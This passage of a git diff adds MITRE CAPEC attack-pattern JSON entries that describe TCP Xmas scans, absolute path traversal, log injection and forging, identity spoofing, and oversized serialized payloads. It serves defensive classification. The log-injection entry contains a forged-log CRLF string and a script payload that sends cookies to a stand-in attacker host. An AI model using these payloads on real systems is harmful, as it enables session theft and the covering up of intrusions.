+ "x_capec_skills_required": {
80
+ "High": "An attacker must be able to craft two X.509 certificates that produce the same hash value",
81
+ "Medium": "Knowledge needed to set up a certification authority"
82
+ },
83
+ "x_capec_status": "Draft",
84
+ "x_capec_typical_severity": "Very High",
85
+ "x_capec_version": "3.9"
86
+ }
87
+ ],
88
+ "spec_version": "2.0",
89
+ "type": "bundle"
90
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--16a18e0c-676c-4fac-89c7-6a7ab96666f4.json ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--0b52684a-61a0-40e3-b69d-053aa8f9e33b",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with all possible flags set in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-303",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/303.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
21
+ "external_id": "REF-33",
22
+ "source_name": "reference_from_CAPEC"
23
+ },
24
+ {
25
+ "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
26
+ "external_id": "REF-128",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "http://www.faqs.org/rfcs/rfc793.html"
29
+ },
30
+ {
31
+ "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7",
32
+ "external_id": "REF-34",
33
+ "source_name": "reference_from_CAPEC"
34
+ },
35
+ {
36
+ "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
37
+ "external_id": "REF-130",
38
+ "source_name": "reference_from_CAPEC",
39
+ "url": "http://phrack.org/issues/51/11.html"
40
+ }
41
+ ],
42
+ "id": "attack-pattern--16a18e0c-676c-4fac-89c7-6a7ab96666f4",
43
+ "modified": "2022-02-22T00:00:00.000Z",
44
+ "name": "TCP Xmas Scan",
45
+ "object_marking_refs": [
46
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
47
+ ],
48
+ "type": "attack-pattern",
49
+ "x_capec_abstraction": "Detailed",
50
+ "x_capec_child_of_refs": [
51
+ "attack-pattern--9ca34308-a8e4-40b6-becd-3ff95bac628a"
52
+ ],
53
+ "x_capec_consequences": {
54
+ "Access_Control": [
55
+ "Bypass Protection Mechanism",
56
+ "Hide Activities"
57
+ ],
58
+ "Authorization": [
59
+ "Bypass Protection Mechanism",
60
+ "Hide Activities"
61
+ ],
62
+ "Availability": [
63
+ "Unreliable Execution"
64
+ ],
65
+ "Confidentiality": [
66
+ "Other",
67
+ "Bypass Protection Mechanism",
68
+ "Hide Activities"
69
+ ]
70
+ },
71
+ "x_capec_domains": [
72
+ "Communications",
73
+ "Software"
74
+ ],
75
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p>An adversary sends TCP packets with all flags set but not associated with an existing connection to target ports.</p></li><li> <p>An adversary uses the response from the target to determine the port's state. If no response is received the port is open. If a RST packet is received then the port is closed.</p></li></ol></div>",
76
+ "x_capec_extended_description": "\n <xhtml:p>In addition to its relative speed when compared with other types of scans, its major advantage is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.</xhtml:p>\n ",
77
+ "x_capec_prerequisites": [
78
+ "The adversary needs logical access to the target network. XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."
79
+ ],
80
+ "x_capec_resources_required": [
81
+ "This attack can be carried out with a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."
82
+ ],
83
+ "x_capec_status": "Stable",
84
+ "x_capec_typical_severity": "Low",
85
+ "x_capec_version": "3.9"
86
+ }
87
+ ],
88
+ "spec_version": "2.0",
89
+ "type": "bundle"
90
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4.json ADDED
@@ -0,0 +1,65 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--c7a6516f-1e2a-475f-9ee5-61eb6ffa9a49",
3
+ "objects": [
4
+ {
5
+ "created": "2017-01-06T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-597",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/597.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-36",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/36.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4",
21
+ "modified": "2021-10-21T00:00:00.000Z",
22
+ "name": "Absolute Path Traversal",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Detailed",
28
+ "x_capec_child_of_refs": [
29
+ "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170"
30
+ ],
31
+ "x_capec_consequences": {
32
+ "Availability": [
33
+ "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)",
34
+ "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)"
35
+ ],
36
+ "Confidentiality": [
37
+ "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)",
38
+ "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)"
39
+ ],
40
+ "Integrity": [
41
+ "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)",
42
+ "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)"
43
+ ]
44
+ },
45
+ "x_capec_domains": [
46
+ "Software"
47
+ ],
48
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Fingerprinting of the operating system: </b>In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.</td></tr><tr><td>TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.</td></tr><tr><td>Induce errors to find informative error messages</td></tr></tbody></table><li> <p> <b>Survey application: </b>Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.</td></tr><tr><td>Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt variations on input parameters: </b>Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Access common files in root directories such as \"/bin\", \"/boot\", \"/lib\", or \"/home\"</td></tr><tr><td>Access a specific drive letter or windows volume letter by specifying \"C:dirname\" for example</td></tr><tr><td>Access a known Windows UNC share by specifying \"\\\\UNC\\share\\name\" for example</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Access, modify, or execute arbitrary files.: </b>An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manipulate file and its path by injecting absolute path sequences (e.g. \"/home/file.txt\").</td></tr><tr><td>Download files, modify files, or try to execute shell commands (with binary files).</td></tr></tbody></table></ol></div>",
49
+ "x_capec_prerequisites": [
50
+ "The target must leverage and access an underlying file system."
51
+ ],
52
+ "x_capec_resources_required": [
53
+ "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results."
54
+ ],
55
+ "x_capec_skills_required": {
56
+ "Low": "Simple command line attacks.",
57
+ "Medium": "Programming attacks."
58
+ },
59
+ "x_capec_status": "Draft",
60
+ "x_capec_version": "3.9"
61
+ }
62
+ ],
63
+ "spec_version": "2.0",
64
+ "type": "bundle"
65
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json ADDED
@@ -0,0 +1,96 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--7e615d84-02f4-4374-845f-55341f2e6a3c",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-93",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/93.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-117",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/117.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-75",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/75.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-150",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/150.html"
28
+ },
29
+ {
30
+ "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley",
31
+ "external_id": "REF-131",
32
+ "source_name": "reference_from_CAPEC"
33
+ },
34
+ {
35
+ "description": "A. Muffet, The night the log was forged",
36
+ "external_id": "REF-550",
37
+ "source_name": "reference_from_CAPEC",
38
+ "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm"
39
+ },
40
+ {
41
+ "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)",
42
+ "external_id": "REF-551",
43
+ "source_name": "reference_from_CAPEC",
44
+ "url": "https://www.owasp.org/index.php/Log_Injection"
45
+ },
46
+ {
47
+ "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)",
48
+ "external_id": "REF-552",
49
+ "source_name": "reference_from_CAPEC",
50
+ "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579"
51
+ }
52
+ ],
53
+ "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486",
54
+ "modified": "2022-09-29T00:00:00.000Z",
55
+ "name": "Log Injection-Tampering-Forging",
56
+ "object_marking_refs": [
57
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
58
+ ],
59
+ "type": "attack-pattern",
60
+ "x_capec_abstraction": "Detailed",
61
+ "x_capec_can_precede_refs": [
62
+ "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f"
63
+ ],
64
+ "x_capec_child_of_refs": [
65
+ "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116"
66
+ ],
67
+ "x_capec_consequences": {
68
+ "Integrity": [
69
+ "Modify Data"
70
+ ]
71
+ },
72
+ "x_capec_domains": [
73
+ "Software"
74
+ ],
75
+ "x_capec_example_instances": [
76
+ "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201",
77
+ "\n <xhtml:p>If a user submits the string \"twenty-one\" for val, the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"result\">INFO: Failed to parse val=twenty-one</xhtml:div>\n <xhtml:p>However, if an attacker submits the string</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"attack\">twenty-one%0a%0aINFO:+User+logged+out%3dbadguy</xhtml:div>\n <xhtml:p>the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"result\">INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy</xhtml:div>\n <xhtml:p>Clearly, attackers can use this same mechanism to insert arbitrary log entries.</xhtml:p>\n "
78
+ ],
79
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine Application's Log File Format: </b>The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine logging utility being used by application (e.g. log4j)</td></tr><tr><td>Gain access to application's source code to determine log file formats.</td></tr><tr><td>Install or obtain access to instance of application and observe its log file format.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate Log Files: </b>The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>\n <xhtml:p>Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"attack\">\"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"</xhtml:div>\n <xhtml:p>may add the following forged entry into a log file:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"result\">\"[Thu Nov 12 12:11:22]:Info: User admin logged in\"</xhtml:div>\n <xhtml:p>Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>\n <xhtml:p>Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"attack\"><script>new Image().src=\"http://xss.attacker.com/log_cookie?cookie=\"+encodeURI(document.cookie);</script></xhtml:div>\n <xhtml:p>The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).</xhtml:p>\n </td></tr></tbody></table></ol></div>",
80
+ "x_capec_likelihood_of_attack": "High",
81
+ "x_capec_prerequisites": [
82
+ "The target host is logging the action and data of the user.",
83
+ "The target host insufficiently protects access to the logs or logging mechanisms."
84
+ ],
85
+ "x_capec_skills_required": {
86
+ "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.",
87
+ "Medium": "A more sophisticated attack can try to defeat the input validation mechanism."
88
+ },
89
+ "x_capec_status": "Draft",
90
+ "x_capec_typical_severity": "High",
91
+ "x_capec_version": "3.9"
92
+ }
93
+ ],
94
+ "spec_version": "2.0",
95
+ "type": "bundle"
96
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b.json ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--7253326b-9dad-4379-a8cc-84ea9e892b20",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-151",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/151.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-287",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/287.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b",
21
+ "modified": "2022-02-22T00:00:00.000Z",
22
+ "name": "Identity Spoofing",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Meta",
28
+ "x_capec_can_follow_refs": [
29
+ "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112",
30
+ "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427",
31
+ "attack-pattern--addd93c9-9278-4185-b402-e505d632c815",
32
+ "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb",
33
+ "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be",
34
+ "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be",
35
+ "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7",
36
+ "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2",
37
+ "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d",
38
+ "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f",
39
+ "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a",
40
+ "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95",
41
+ "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f",
42
+ "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c",
43
+ "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a",
44
+ "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170",
45
+ "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814",
46
+ "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b"
47
+ ],
48
+ "x_capec_consequences": {
49
+ "Access_Control": [
50
+ "Gain Privileges"
51
+ ],
52
+ "Authentication": [
53
+ "Gain Privileges"
54
+ ],
55
+ "Confidentiality": [
56
+ "Gain Privileges"
57
+ ],
58
+ "Integrity": [
59
+ "Gain Privileges"
60
+ ]
61
+ },
62
+ "x_capec_domains": [
63
+ "Social Engineering",
64
+ "Communications",
65
+ "Software",
66
+ "Hardware"
67
+ ],
68
+ "x_capec_extended_description": "\n <xhtml:p>Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.</xhtml:p>\n ",
69
+ "x_capec_likelihood_of_attack": "Medium",
70
+ "x_capec_parent_of_refs": [
71
+ "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5",
72
+ "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119",
73
+ "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9",
74
+ "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285",
75
+ "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896"
76
+ ],
77
+ "x_capec_prerequisites": [
78
+ "The identity associated with the message or resource must be removable or modifiable in an undetectable way."
79
+ ],
80
+ "x_capec_resources_required": [
81
+ "None: No specialized resources are required to execute this type of attack."
82
+ ],
83
+ "x_capec_status": "Stable",
84
+ "x_capec_typical_severity": "Medium",
85
+ "x_capec_version": "3.9"
86
+ }
87
+ ],
88
+ "spec_version": "2.0",
89
+ "type": "bundle"
90
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17.json ADDED
@@ -0,0 +1,100 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--612be2e7-2402-4065-9f51-d308b4383201",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-231",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/231.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-112",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/112.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-20",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/20.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-674",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/674.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-770",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/770.html"
33
+ },
34
+ {
35
+ "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007",
36
+ "external_id": "REF-89",
37
+ "source_name": "reference_from_CAPEC",
38
+ "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html"
39
+ }
40
+ ],
41
+ "id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17",
42
+ "modified": "2022-09-29T00:00:00.000Z",
43
+ "name": "Oversized Serialized Data Payloads",
44
+ "object_marking_refs": [
45
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
46
+ ],
47
+ "type": "attack-pattern",
48
+ "x_capec_abstraction": "Standard",
49
+ "x_capec_alternate_terms": [
50
+ "XML Denial of Service (XML DoS)"
51
+ ],
52
+ "x_capec_child_of_refs": [
53
+ "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024"
54
+ ],
55
+ "x_capec_consequences": {
56
+ "Access_Control": [
57
+ "Gain Privileges"
58
+ ],
59
+ "Authorization": [
60
+ "Gain Privileges"
61
+ ],
62
+ "Availability": [
63
+ "Resource Consumption",
64
+ "Execute Unauthorized Commands"
65
+ ],
66
+ "Confidentiality": [
67
+ "Read Data",
68
+ "Execute Unauthorized Commands",
69
+ "Gain Privileges"
70
+ ],
71
+ "Integrity": [
72
+ "Execute Unauthorized Commands"
73
+ ]
74
+ },
75
+ "x_capec_domains": [
76
+ "Software"
77
+ ],
78
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.</p></li></ol></div>",
79
+ "x_capec_extended_description": "\n <xhtml:p>Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.</xhtml:p>\n ",
80
+ "x_capec_likelihood_of_attack": "Medium",
81
+ "x_capec_parent_of_refs": [
82
+ "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b",
83
+ "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861"
84
+ ],
85
+ "x_capec_prerequisites": [
86
+ "An application uses an parser for serialized data to perform transformation on user-controllable data.",
87
+ "An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser."
88
+ ],
89
+ "x_capec_skills_required": {
90
+ "High": "Arbitrary code execution",
91
+ "Low": "Denial of service"
92
+ },
93
+ "x_capec_status": "Draft",
94
+ "x_capec_typical_severity": "High",
95
+ "x_capec_version": "3.9"
96
+ }
97
+ ],
98
+ "spec_version": "2.0",
99
+ "type": "bundle"
100
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--25946b99-9827-40a6-99a4-ca15eea08e5d.json ADDED
@@ -0,0 +1,63 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--f748b83a-ea5d-4385-a6ce-359237c3e881",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or \"back engineer\" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices, or software, although the methodology and techniques involved in each type of analysis differ widely.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-188",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/188.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-1278",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/1278.html"
18
+ },
19
+ {
20
